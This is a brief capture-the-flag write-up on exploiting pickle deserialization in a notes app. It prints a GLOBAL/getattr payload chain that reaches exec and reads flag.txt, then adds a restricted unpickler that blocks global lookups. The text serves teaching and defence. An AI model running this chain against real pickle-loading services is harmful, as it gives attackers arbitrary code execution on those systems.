Python pickle deserialization vulnerability
The flag is located in
Pickle is used to save and load notes into the application.
getattr = GLOBAL('__builtin__', 'getattr')
dict = GLOBAL('__builtin__', 'dict')
dict_get = getattr(dict, 'get')
glo_dic = GLOBAL('__builtin__', 'globals')()
builtins = dict_get(glo_dic, '__builtins__')
exec = getattr(builtins, 'exec')
exec("print(open('flag.txt', 'r').read())")
The idea is that using getattr, we can get submodules of __builtin__ (and the submodules of the submodules), down to builtins, which includes exec. Once we have control over exec, we can execute arbitrary code.
Submit the base64-encoded opcodes, and we obtain the flags.
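On the application side, the chain above stops at its first opcode if the note loader refuses to resolve globals. The following is an added example, not code from the original write-up or from the challenge. It assumes notes are plain dict/list/str data; `NoteUnpickler`, `load_note` and `try_load` are hypothetical names, and both sample blobs are constructed.

```python
import base64
import io
import pickle


class NoteUnpickler(pickle.Unpickler):
    """Unpickler for note data that refuses every global lookup."""

    def find_class(self, module, name):
        # Assumption: notes are plain dict/list/str/int values, which never
        # need find_class. Any GLOBAL/STACK_GLOBAL opcode is treated as hostile.
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def load_note(b64_blob):
    """Decode a base64 note and unpickle it without resolving any globals."""
    raw = base64.b64decode(b64_blob, validate=True)
    return NoteUnpickler(io.BytesIO(raw)).load()


def try_load(b64_blob):
    """Return (ok, note_or_reason) instead of raising, so rejects can be logged."""
    try:
        return True, load_note(b64_blob)
    except (pickle.UnpicklingError, ValueError, EOFError) as exc:
        return False, str(exc)


# Constructed sample: an ordinary note, pickled as plain data.
BENIGN = base64.b64encode(pickle.dumps({"title": "todo", "body": "buy milk"}))
# Constructed sample: only the first lookup of the chain shown above.
# It asks for a reference to getattr and executes nothing.
GETATTR_REF = base64.b64encode(b"c__builtin__\ngetattr\n.")

if __name__ == "__main__":
    print(try_load(BENIGN))
    print(try_load(GETATTR_REF))
```

If notes ever need custom classes, replace the blanket refusal with an explicit allow-list of (module, name) pairs; a data-only format such as JSON avoids the problem entirely.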